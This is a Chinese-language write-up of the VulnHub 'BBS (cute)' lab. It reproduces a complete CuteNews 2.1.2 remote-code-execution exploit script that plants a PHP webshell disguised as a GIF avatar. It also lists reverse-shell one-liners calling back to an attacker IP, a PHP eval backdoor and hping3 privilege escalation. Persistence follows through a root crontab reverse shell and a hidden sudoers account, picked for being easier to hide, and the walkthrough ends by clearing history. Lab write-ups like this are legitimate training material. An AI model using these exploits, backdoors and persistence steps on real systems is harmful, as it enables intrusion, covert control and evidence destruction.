WP：靶场BBS (cute): 1.0.2

WP：靶场BBS (cute): 1.0.2

靶场地址：https://www.vulnhub.com/entry/bbs-cute-102,567/#release

1、信息收集

1. namp -sV 192.168.2.0/24
2.         Starting Nmap 7.91 ( https://nmap.org ) at 2022-07-29 19:12 CST
3.     Nmap scan report for 192.168.2.1 (192.168.2.1)
4.     Host is up (0.0066s latency).
5.     Not shown: 996 filtered ports
6.     PORT     STATE SERVICE    VERSION
7.     25/tcp   open  tcpwrapped
8.     80/tcp   open  tcpwrapped
9.     110/tcp  open  tcpwrapped
10.     1900/tcp open  tcpwrapped
12.     Nmap scan report for 192.168.2.101 (192.168.2.101)
13.     Host is up (0.0056s latency).
14.     Not shown: 996 filtered ports
15.     PORT     STATE SERVICE    VERSION
16.     25/tcp   open  tcpwrapped
17.     80/tcp   open  tcpwrapped
18.     110/tcp  open  tcpwrapped
19.     1900/tcp open  tcpwrapped
21.     Nmap scan report for 192.168.2.105 (192.168.2.105)
22.     Host is up (0.0025s latency).
23.     Not shown: 994 filtered ports
24.     PORT    STATE SERVICE    VERSION
25.     22/tcp  open  tcpwrapped
26.     25/tcp  open  tcpwrapped
27.     80/tcp  open  tcpwrapped
28.     88/tcp  open  tcpwrapped
29.     110/tcp open  tcpwrapped
30.     995/tcp open  tcpwrapped
32.     Nmap scan report for 192.168.2.255 (192.168.2.255)
33.     Host is up (0.0069s latency).
34.     Not shown: 997 closed ports
35.     PORT    STATE    SERVICE    VERSION
36.     25/tcp  open     tcpwrapped
37.     110/tcp open     tcpwrapped
38.     514/tcp filtered shell
40.     Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
41.     Nmap done: 256 IP addresses (4 hosts up) scanned in 23.59 seconds
43. namp -p80 -sV -sC 192.168.2.105
44.     Starting Nmap 7.91 ( https://nmap.org ) at 2022-07-29 19:14 CST
45.     Nmap scan report for 192.168.2.105 (192.168.2.105)
46.     Host is up (0.00057s latency).
48.     PORT   STATE SERVICE VERSION
49.     80/tcp open  http    Apache httpd 2.4.38 ((Debian))
50.     |_http-server-header: Apache/2.4.38 (Debian)
51.     |_http-title: Apache2 Debian Default Page: It works
53.     Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
54.     Nmap done: 1 IP address (1 host up) scanned in 6.69 seconds

复制代码

1. dirbuster        #启动dirbuster目录扫描

复制代码

访问扫描出来的文件

2、整理信息发现漏洞

使用searchsploit搜索漏洞库中包含的cutenews版本

1. searchsploit cutenews 2.1.2

复制代码

这里可以看到

1. CuteNews 2.1.2 - 'avatar' 远程代码执行 (M
2. CuteNews 2.1.2 - 任意文件删除
3. CuteNews 2.1.2 - 认证的任意文件上传
4. CuteNews 2.1.2 - 远程代码执行

复制代码

这里我们选择"远程代码执行"

1. cp /usr/share/exploitdb/exploits/php/webapps/48800.py ./
2. python3 48800.py

复制代码

发现此脚本不能够直接使用，然后分析了一下脚本内容，发现在脚本URL路径中，需要改动/CuteNews位置，将此文件夹全部去除。改后的exp如下

1. # Exploit Title: CuteNews 2.1.2 - Remote Code Execution
2. # Google Dork: N/A
3. # Date: 2020-09-10
4. # Exploit Author: Musyoka Ian
5. # Vendor Homepage: https://cutephp.com/cutenews/downloading.php
6. # Software Link: https://cutephp.com/cutenews/downloading.php
7. # Version: CuteNews 2.1.2
8. # Tested on: Ubuntu 20.04, CuteNews 2.1.2
9. # CVE : CVE-2019-11447
11. #! /bin/env python3
13. import requests
14. from base64 import b64decode
15. import io
16. import re
17. import string
18. import random
19. import sys
22. banner = """
25.            _____     __      _  __                     ___   ___  ___
26.           / ___/_ __/ /____ / |/ /__ _    _____       |_  | <  / |_  |
27.          / /__/ // / __/ -_)    / -_) |/|/ (_-<      / __/_ / / / __/
28.          \___/\_,_/\__/\__/_/|_/\__/|__,__/___/     /____(_)_(_)____/
29.                                 ___  _________                        
30.                                / _ \/ ___/ __/                        
31.                               / , _/ /__/ _/                          
32.                              /_/|_|\___/___/                          
33.                                                                      
35.                                                                                                                                                    
36. """
37. print (banner)
38. print ("[->] Usage python3 expoit.py")
39. print ()
40. sess = requests.session()
41. payload = "GIF8;\n<?php system($_REQUEST['cmd']) ?>"
42. ip = input("Enter the URL> ")
43. def extract_credentials():
44.     global sess, ip
45.     url = f"{ip}/cdata/users/lines"
46.     encoded_creds = sess.get(url).text
47.     buff = io.StringIO(encoded_creds)
48.     chash = buff.readlines()
49.     if "Not Found" in encoded_creds:
50.             print ("[-] No hashes were found skipping!!!")
51.             return
52.     else:
53.         for line in chash:
54.             if "<?php die('Direct call - access denied'); ?>" not in line:
55.                 credentials = b64decode(line)
56.                 try:
57.                     sha_hash = re.search('"pass";s:64:"(.*?)"', credentials.decode()).group(1)
58.                     print (sha_hash)
59.                 except:
60.                     pass
61. def register():
62.     global sess, ip
63.     userpass = "".join(random.SystemRandom().choice(string.ascii_letters + string.digits ) for _ in range(10))
64.     postdata = {
65.         "action" : "register",
66.         "regusername" : userpass,
67.         "regnickname" : userpass,
68.         "regpassword" : userpass,
69.         "confirm" : userpass,
70.         "regemail" : f"{userpass}@hack.me"
71.     }
72.     register = sess.post(f"{ip}/index.php?register", data = postdata, allow_redirects = False)
73.     if 302 == register.status_code:
74.         print (f"[+] Registration successful with username: {userpass} and password: {userpass}")
75.     else:
76.         sys.exit()
77. def send_payload(payload):
78.     global ip
79.     token = sess.get(f"{ip}/index.php?mod=main&opt=personal").text
80.     signature_key = re.search('signature_key" value="(.*?)"', token).group(1)
81.     signature_dsi = re.search('signature_dsi" value="(.*?)"', token).group(1)
82.     logged_user = re.search('disabled="disabled" value="(.*?)"', token).group(1)
83.     print (f"signature_key: {signature_key}")
84.     print (f"signature_dsi: {signature_dsi}")
85.     print (f"logged in user: {logged_user}")
87.     files = {
88.         "mod" : (None, "main"),
89.         "opt" : (None, "personal"),
90.         "__signature_key" : (None, f"{signature_key}"),
91.         "__signature_dsi" : (None, f"{signature_dsi}"),
92.         "editpassword" : (None, ""),
93.         "confirmpassword" : (None, ""),
94.         "editnickname" : (None, logged_user),
95.         "avatar_file" : (f"{logged_user}.php", payload),
96.         "more[site]" : (None, ""),
97.         "more[about]" : (None, "")
98.     }
99.     payload_send = sess.post(f"{ip}/index.php", files = files).text
100.     print("============================\nDropping to a SHELL\n============================")
101.     while True:
102.         print ()
103.         command = input("command > ")
104.         postdata = {"cmd" : command}
105.         output = sess.post(f"{ip}/uploads/avatar_{logged_user}_{logged_user}.php", data=postdata)
106.         if 404 == output.status_code:
107.             print ("sorry i can't find your webshell try running the exploit again")
108.             sys.exit()
109.         else:
110.             output = re.sub("GIF8;", "", output.text)
111.             print (output.strip())
113. if __name__ == "__main__":
114.     print ("================================================================\nUsers SHA-256 HASHES TRY CRACKING THEM WITH HASHCAT OR JOHN\n================================================================")
115.     extract_credentials()
116.     print ("================================================================")
117.     print()
118.     print ("=============================\nRegistering a users\n=============================")
119.     register()
120.     print()
121.     print("=======================================================\nSending Payload\n=======================================================")
122.     send_payload(payload)
123.     print ()

复制代码

3、利用漏洞

1. python3 ./48800.py

复制代码

尝试一句话

写一句话

1. echo "<?php @eval($_POST['a']);?>" >> /var/www/html/a.php

复制代码

反弹并升级shell

但即使是登录用户也是显示500权限不够，看来可能是使用的www-data用户，权限不够，需要想办法升级shell并且提权

1. # 反弹shell总结(https://xz.aliyun.com/t/9488)
2. # 被攻击端
3. netcat 192.168.2.106 2333 -e /bin/bash
4. bash -i >& /dev/tcp/192.168.2.106/2333 0>&1
5. bash -c "bash -i >& /dev/tcp/192.168.2.106/2333 0>&1"
6. rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.2.106 1234 >/tmp/f

复制代码

升级至交互shell，利用反弹shell

1. # 被攻击端
2. bash -c "/bin/bash -i >& /dev/tcp/192.168.2.106/2333 0>&1"
3. # 攻击端
4. netcat -lvvp 2333

复制代码

交互shell补充

本次测试中发现，使用上述确实已经提升到了/bin/bash的交互shell，但后续因为需要利用hping3的控制台，上述的交互shell进入后没有回显，有点问题。所以需要借助python，调用以下pty伪终端平台(https://docs.python.org/zh-cn/3/library/pty.html)

1. python -c "import pty;pty.spawn('/bin/bash')"

复制代码

提权

利用sudo工具提权，查看一下sudo的配置情况

1. sudo -l

复制代码

根据提示，利用hping3将权利提高至root(https://www.cnblogs.com/zlgxzswjy/p/14115306.html)

1. /usr/sbin/hping3

复制代码

1. cat /root/root.txt

复制代码

4、维持权限

写入一句话时发现PHP没有开启此变量，故需要调整PHP配置文件等

为方便操作，直接写定时任务，并尝试使用root用户进行每隔一分钟反弹

1. # 之前连接靶机并且转为hping3的shell
2. echo "*/1 * * * * root netcat 192.168.2.106 3322 -e /bin/bash" >> /etc/crontab
4. # 攻击端
5. nc -lvvp 3322
6. python -c "import pty;pty.spawn('/bin/bash')"

复制代码

使用root用户，直接修改ssh服务，并添加类似root用户权限的用户

1. adduser rin
2. usermod -g root rin
4. # 推荐下面这种方法(改动较少，更容易隐藏)
5. adduser rin
6. echo "rin ALL=(ALL) ALL" >> /etc/sudoers
7. # ssh连接
8. ssh rin@192.168.2.105

复制代码

1. #########补充：赋予root权限#################
3. 方法一：修改 /etc/sudoers 文件，找到下面一行，把前面的注释（#）去掉
5. ## Allows people in group wheel to run all commands
6. %wheel    ALL=(ALL)    ALL
8. 然后修改用户，使其属于root组（wheel），命令如下：
10. #usermod -g root tommy
12. 修改完毕，现在可以用tommy帐号登录，然后用命令 su – ，即可获得root权限进行操作。
14. 方法二：修改 /etc/sudoers 文件，找到下面一行，在root下面添加一行，如下所示：
16. ## Allow root to run any commands anywhere
17. root    ALL=(ALL)     ALL
18. tommy   ALL=(ALL)     ALL
20. 修改完毕，现在可以用tommy帐号登录，然后用命令 sudo – ，即可获得root权限进行操作。
22. 方法三：修改 /etc/passwd 文件，找到如下行，把用户ID修改为 0 ，如下所示：
23. tommy:x:0:33:tommy:/data/webroot:/bin/bash

复制代码

5、清除痕迹

1. https://www.cnblogs.com/xiaozi/p/13648156.html
2. https://blog.csdn.net/Captain_RB/article/details/111653887
4. hping3> history clear

复制代码

免责声明：如果侵犯了您的权益，请联系站长，我们会及时删除侵权内容，谢谢合作！